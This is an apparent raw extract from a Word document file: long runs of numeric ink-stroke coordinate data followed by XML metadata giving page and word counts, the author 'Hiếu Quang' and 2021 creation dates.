1,-1 2,-57 20,79-23,-1-1,0-1,0 0,0-1,0-1,-22-1,-18 1,46 2,1-1,0 1,0 1,0 0,0 0,1 1,0 0,0 1,-14 10,-14 9,-219 113,249-134,-22 11,29-15,-1 0,1 1,0-1,-1 0,1 0,0 1,-1-1,1 0,0 1,-1-1,1 0,0 1,-1-1,1 0,0 1,0-1,0 1,-1-1,1 1,0-1,0 0,0 1,0-1,0 1,0-1,0 1,0-1,0 1,0-1,0 1,0-1,0 0,0 1,0-1,0 1,1-1,-1 1,0-1,0 0,0 1,1-1,-1 1,0-1,1 0,-1 1,0-1,1 0,-1 0,0 1,1-1,-1 0,1 0,0 1,12 5,0-1,0 0,1-1,-1-1,1 0,0-1,0 0,22-1,-7 2,708 11,-161-10,201 3,-455-9,155 13,198-7,-355-7,1345 3,-1605-2,74-14,-4 1,828-4,-640 21,2206-2,-2426 5,125 21,-174-19,65 15,-75-12,1-3,65 5,-103-12,0 0,0 0,0 0,0 0,0 0,0 0,0-1,0 1,0 0,-1-1,1 0,0 1,0-1,0 0,-1 0,1 0,-1 0,3-2,-2 0,0 0,0-1,-1 1,1 0,-1-1,0 1,0-1,1-4,-1 5,1-2,-1 1,1-1,0 1,1 0,-1 0,1 0,0 0,0 1,0-1,1 1,-1-1,1 1,0 0,-1 1,1-1,8-3,7-3,1 0,31-8,-16 5,-14 6,-1 1,40-5,-2 1,-7 2,1 2,-1 2,70 6,-23 0,886-3,-769-13,-8 0,1578 14,-1467-14,1813 13,-1957-13,21 1,-136 12,-46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50:16.55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5:35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151 1,'18'1,"1"1,35 8,15 2,160 20,-197-27,5 0,67 20,57 18,2 0,-89-22,2-4,87 10,-47-10,-20-1,172 8,11-26,153 3,-271 11,25 1,-40-1,-3 0,72-9,202 4,-291-3,201 9,160-2,-395-7,145 26,-34-3,71-14,-148-10,119 24,-38-2,10-15,127 11,280-5,-406-18,7004 2,-7107-5,-98 4,-1-2,0 0,0 0,29-12,4-8,-29 13,2 0,26-8,-17 9,51-14,-2-3,82-40,-146 59,-12 6,0-1,0 1,0-1,0-1,0 1,6-5,-10 7,0 0,0 0,0-1,0 1,0 0,0 0,0 0,1 0,-1 0,0 0,0 0,0 0,0-1,0 1,0 0,0 0,0 0,0 0,0 0,0 0,0-1,0 1,0 0,0 0,0 0,0 0,0 0,0 0,0-1,0 1,0 0,0 0,0 0,0 0,0 0,-1 0,1 0,0 0,0-1,0 1,0 0,0 0,0 0,0 0,0 0,0 0,-1 0,1 0,0 0,-10-3,-12 1,-129 2,-103-7,169 2,-90 7,-62-4,188-4,-68-18,76 14,-1 2,-69-6,26 8,-94-20,146 21,-331-47,195 29,43 11,-205 9,182 5,3-1,-219-2,3-28,243 13,-185-1,130 25,-306 53,443-56,-44 0,54-4,1 0,-1 2,1 1,-29 8,29-6,0-2,0 0,-1-2,1-1,-35-3,10 0,-74 2,-1 5,-178 29,139-5,-2-7,-234 0,-1988-23,2268-4,-192-34,201 27,-24-5,-207-33,132 22,127 15,-45-7,-222-8,249 27,-96 3,187-1,1 1,-1 0,0 0,1 1,-1 1,1 0,-15 8,-68 46,19-11,-126 54,133-73,-2-3,-125 27,123-41,52-9,0 0,-36 11,-23 8,-2-3,-95 9,85-14,-77 4,-286-8,287-10,60-4,-177-32,63 5,-110 19,47 15,-488-4,708-2,1-2,-71-16,126 20,-1 0,1 1,0 1,0-1,-1 1,1 0,-9 2,13-1,0 0,0 0,0 0,0 0,0 0,0 1,0 0,0-1,1 1,-1 0,1 1,-1-1,1 0,0 1,0-1,0 1,0-1,-1 4,-6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5:52.1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73 63,'165'-2,"331"16,-333 19,-10-19,233-10,-210-5,605 1,-750 1,0 2,37 9,23 2,165-6,35 3,141 16,2-27,-179-2,2112 2,-2105 13,-40-1,188-2,23-27,-129-1,582 6,-834 10,62-12,-2 1,1038-9,-791 23,142-8,-205 2,101 6,134-3,-163-39,-221 19,-40 7,181-17,-182 27,160-4,434 9,-626 4,88 15,-41-3,-85-10,0 1,63 23,-46-13,9 2,106 48,-152-60,-13-6,-1-1,1 1,0 0,-1 0,1 0,-1 0,0 1,1-1,-1 1,0-1,0 1,0 0,0 0,0 0,-1 0,1 0,0 0,1 3,-3-4,0-1,0 1,0 0,0-1,0 1,0 0,-1-1,1 1,0 0,0-1,0 1,-1-1,1 1,0-1,-1 1,1 0,0-1,-1 1,1-1,-1 1,1-1,0 0,-1 1,1-1,-1 1,0-1,1 0,-1 0,1 1,-1-1,0 0,1 0,-1 1,1-1,-2 0,-24 5,23-4,-51 3,-84-3,81-2,-75 8,28 7,2 0,-142 2,239-16,-181-2,-269 32,389-23,-74-3,-31 2,-270 22,271-27,-235-15,237 3,114 9,-133-11,17-7,32 1,-491 8,387 13,240-2,0 0,0 0,0 0,0 0,0 0,0 1,0-1,0 1,0-1,0 1,0 0,0 0,0 0,1 0,-1 0,0 0,1 0,-1 1,0-1,1 1,0-1,-1 1,1-1,0 1,0 0,0 0,0-1,-1 5,1-3,0 0,1 1,0-1,-1 0,1 0,1 1,-1-1,0 0,1 1,-1-1,1 0,0 0,0 0,1 0,-1 0,0 0,5 5,-6-6,5 4,0 1,-1 0,0 0,-1 1,4 11,-6-18,-1 0,0 0,0 1,1-1,-1 0,0 0,0 1,0-1,0 0,-1 0,1 1,0-1,0 0,-1 0,1 0,-1 0,1 1,-1-1,1 0,-1 0,0 0,0 0,1 0,-1 0,0 0,0-1,0 1,0 0,0 0,0-1,0 1,0-1,-1 1,1-1,0 1,0-1,0 1,0-1,-1 0,1 0,0 0,0 0,-1 0,-1 0,-39 3,-58-2,-6 0,74 2,0 1,-48 14,51-13,-1-2,1 0,-1-2,-49-4,5 1,-3169 2,2844-16,127-20,-21-2,-568 3,842 37,0 0,0 1,0 1,1 1,-23 8,-48 12,-129-2,186-20,-39 9,-19 3,-305-8,237-9,150 2,-637-16,413 9,82 5,50-4,-42-1,-1846 8,1972 0,0 1,0 1,1 0,-1 1,-21 8,21-6,0-1,0 0,0-2,0 0,-19 1,-289 7,311-11,-11 1,0-2,-25-4,40 3,1 0,-1 0,1-1,0 0,0 0,0-1,0 0,1-1,-9-6,-25-14,31 19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6:06.0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9706 212,'-3327'0,"2814"-24,361 14,-418-3,114 6,-26-26,376 16,62 9,-53-3,-510 7,314 7,-2084-3,2360-1,1-1,-27-7,-10 0,-22-3,51 7,-2 1,1 1,0 1,-47 3,11 6,15-3,1 2,-74 20,117-25,0 0,-1 0,1-1,0 1,0 1,0-1,0 0,0 0,0 1,0-1,1 1,-1 0,-2 3,3-4,1 0,-1 0,0 0,1 0,0 0,-1 1,1-1,0 0,0 0,-1 0,1 1,0-1,0 0,0 0,1 1,-1-1,0 0,0 0,1 2,0-1,1 1,-1-1,1 0,-1 0,1 0,-1 0,1 0,0-1,0 1,0 0,0-1,0 0,0 1,1-1,-1 0,0 0,1 0,-1 0,1-1,-1 1,1-1,-1 1,4-1,121 18,-91-11,0-2,56 2,121-14,44 0,419 24,-217-8,-56-2,-284-2,216 19,-208-13,198-7,-169-6,933 2,-780-24,-112 5,451-41,-211 4,-211 22,52-5,24 22,-26 4,-171 14,-91-1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6:21.23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40,'35'-2,"0"-1,45-11,-42 7,60-5,381 11,-226 3,540-2,-780 1,0 0,0 1,21 6,-19-4,0-1,21 2,224-4,-257-1,0 1,0-1,0 1,0-1,1 1,-1 0,0 0,-1 1,1-1,0 0,3 3,-6-4,1 1,-1-1,0 0,0 0,1 0,-1 1,0-1,0 0,0 0,0 0,1 1,-1-1,0 0,0 0,0 1,0-1,0 0,0 1,0-1,0 0,0 0,0 1,0-1,0 0,0 1,0-1,0 0,0 0,0 1,0-1,0 0,0 0,0 1,0-1,-1 0,1 0,0 1,0-1,-1 0,0 2,-1-1,0 0,1 0,-1 0,0-1,0 1,0 0,0-1,0 1,-3-1,-33 5,-1-1,0-3,-46-3,6 0,-1055 1,1042 6,0 4,-164 38,205-37,1 3,1 3,-57 24,106-40,-1 1,0-1,0 0,1 0,-1 1,0-1,0 1,1-1,-1 0,0 1,1-1,-1 1,1 0,-1-1,0 1,1-1,-1 1,1 0,0-1,-1 1,1 0,0 0,-1 0,1 0,1-1,-1 1,1-1,-1 1,1-1,-1 1,1-1,-1 1,1-1,0 0,-1 1,1-1,0 0,-1 0,1 1,0-1,-1 0,1 0,1 0,44 4,-45-4,295-1,50 1,-252 6,33 0,-96-4,0 2,-1 0,58 18,-68-16,-12-4,0 2,-1-1,1 1,-1 0,1 1,10 8,-10-7,0 0,1-1,-1 0,19 8,17-1,1-2,0-2,0-2,57 0,75 11,-92-3,1-4,87-1,901-10,-1039-1,54-9,-53 5,46-1,-74 6,0 0,0 0,0-1,-1 0,1-1,13-6,23-7,-6 8,-22 5,0 0,0-1,-1-1,1 0,17-10,-10 6,-20 8,1 0,-1 0,1-1,-1 1,0-1,0 0,1 0,-1 0,4-4,-7 6,1 0,-1 0,0-1,0 1,0 0,0 0,0 0,0-1,1 1,-1 0,0 0,0-1,0 1,0 0,0 0,0-1,0 1,0 0,0 0,0-1,0 1,0 0,0 0,0-1,-1 1,1 0,0 0,0 0,0-1,0 1,0 0,0 0,-1 0,1-1,0 1,0 0,0 0,0 0,-1-1,-13-4,-13 2,-149 9,59 0,-402-5,301 10,-996-8,638-5,373 15,198-13,-7 0,-1 0,1 0,0 2,0-1,-24 8,27-5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6:14.7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1,'222'8,"-160"-5,440 25,-115 9,-115-7,354 1,304-31,-2741 0,1618-13,-7 1,92 10,-97 5,185-1,1 2,0 0,1 2,-21 7,20-5,-1-2,0 0,-34 5,-52-9,82-2,12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7:38.0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03T00:46:57.8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37 0,'0'2,"1"0,-1-1,0 1,1-1,-1 1,1-1,0 1,0-1,-1 1,1-1,0 1,0-1,0 0,0 1,1-1,-1 0,0 0,0 0,1 0,-1 0,1 0,-1-1,1 1,-1 0,1-1,-1 1,1-1,0 1,-1-1,4 1,7 1,0-1,1 0,13-1,-16 0,16 2,-1 1,45 11,-40-7,43 4,-65-10,1-1,-1 1,1 0,-1 1,0 0,0 0,0 1,0 0,0 0,-1 1,1 0,-1 0,0 1,0 0,-1 0,1 0,6 8,-9-9,0 0,0-1,1 1,-1-1,1 0,0-1,0 1,0-1,0 0,0 0,1-1,-1 1,1-1,-1 0,1-1,8 1,27 4,-20 4,-21-8,1-1,-1 0,0 1,0-1,1 0,-1 1,0-1,1 1,-1-1,0 0,0 1,0-1,0 1,1-1,-1 1,0-1,0 0,0 1,0-1,0 1,0-1,0 1,0-1,0 1,0-1,-1 1,0 1,0-1,0 0,0 1,0-1,0 0,-1 0,1 1,0-1,-1 0,1 0,-1-1,1 1,-1 0,0 0,1-1,-1 1,0-1,0 0,-2 1,-25 4,1-1,0-2,-1-1,0-1,1-1,-54-10,53 6,0 1,0 1,-1 1,1 2,-54 6,81-5,0-1,0 0,0 1,0-1,0 1,0 0,0 0,0 0,0 0,0 0,1 0,-3 2,3-2,1-1,-1 1,1 0,-1-1,1 1,0 0,-1-1,1 1,0 0,-1 0,1 0,0-1,0 1,0 0,0 0,0 0,0-1,0 1,0 0,0 0,0 1,2 1,-1 0,0-1,1 1,-1-1,1 1,0-1,0 1,0-1,0 0,0 0,1 0,-1 0,1-1,4 4,8 2,11 8,-25-15,-1 1,0-1,0 0,0 0,0 1,0-1,0 0,0 0,0 1,0-1,0 0,0 1,0-1,-1 0,1 0,0 1,0-1,0 0,0 0,0 0,0 1,-1-1,1 0,0 0,0 0,0 1,-1-1,1 0,0 0,0 0,0 0,-1 0,1 1,0-1,0 0,-1 0,1 0,0 0,0 0,-1 0,1 0,0 0,0 0,-1 0,1 0,0 0,-1 0,1 0,0 0,-1 0,-15 2,4-2,0-1,1 0,-19-5,21 4,0 1,1-1,-1 1,0 0,1 1,-1 0,0 1,-9 1,17-2,0 0,-1 1,1-1,0 0,0 1,0-1,0 1,0-1,0 1,-1-1,1 1,0 0,1-1,-1 1,0 0,0 0,0 0,0 0,1 0,-1 0,0 0,1 0,-1 0,1 0,-1 0,1 0,-1 0,1 0,0 1,0-1,-1 0,1 0,0 0,0 1,0-1,0 0,1 0,-1 0,1 2,0 0,0 0,0-1,0 1,1 0,0-1,-1 1,1-1,0 1,0-1,0 0,1 0,-1 0,0 0,5 3,10 3,0 0,0-1,1-1,0-1,19 4,96 11,-116-18,277 14,-207-14,822 3,-501-8,-398 3,121 1,196-25,-206 1,27-4,-101 23,86 4,-54 3,155 9,6-11,351 8,-488-7,-35-1,90 13,-51-1,131-2,-229-11,161 5,107 1,131 7,-379-12,-9 0,0-1,25-4,-41 4,0 0,-1-1,1 0,0 0,0 0,-1 0,1-1,-1 1,1-1,-1 0,0 0,0 0,1-1,-1 1,-1-1,1 1,4-6,-7 7,1 1,-1-1,0 0,1 1,-1-1,0 1,1-1,-1 0,0 1,0-1,0 0,0 1,0-1,0 0,1 1,-2-1,1 0,0 1,0-1,0 0,0 0,0 1,0-1,-1 1,1-1,0 0,-1 1,1-1,-19-11,-28 4,-595-20,-1 28,238 3,67-2,-373-3,638 1,0-4,1-3,-76-18,66 3,-49-10,32 16,-284-39,360 55,0-1,0-1,0-2,0 0,1-1,-32-14,53 20,0 0,0-1,1 1,-1 0,0-1,1 1,-1 0,1-1,-1 1,1-1,-1 1,0-1,1 1,-1-1,1 1,0-1,-1 1,1-1,0 0,-1 1,1-1,0 0,-1 1,1-1,0 0,0 0,0 0,0 0,1 0,-1 0,1 0,-1 0,1 0,0 1,0-1,-1 0,1 0,0 1,0-1,0 1,0-1,-1 1,1-1,2 0,47-14,-46 15,62-11,1 4,1 3,88 5,-67 0,1072-2,463 4,-1149 13,-323-9,-108-5,-1 2,53 11,-42-4,1-2,0-3,84-1,430-6,-242 14,-156-14,187 2,-326 1,-1 2,34 8,-34-5,0-1,36 0,538-5,-280-3,71-4,32 0,55-7,-435 13,-1-2,0-2,0-2,71-18,-91 18,1 1,-1 2,43-1,20-2,91-7,196 10,-188 5,182-4,389 4,-530 23,-80-5,11-7,201 29,-266-27,143 6,100-18,-207-4,1491 0,-1568 0,1-2,79-16,-106 14,0 0,1 2,31 1,-51 1,-1 0,1 0,0-1,15-5,-13 4,-1 0,0 0,15 0,199 3,-214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14</Pages>
  <Words>401</Words>
  <Characters>2287</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>19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Quang</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Hiếu Quang</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-10-31T06:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-03T00:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>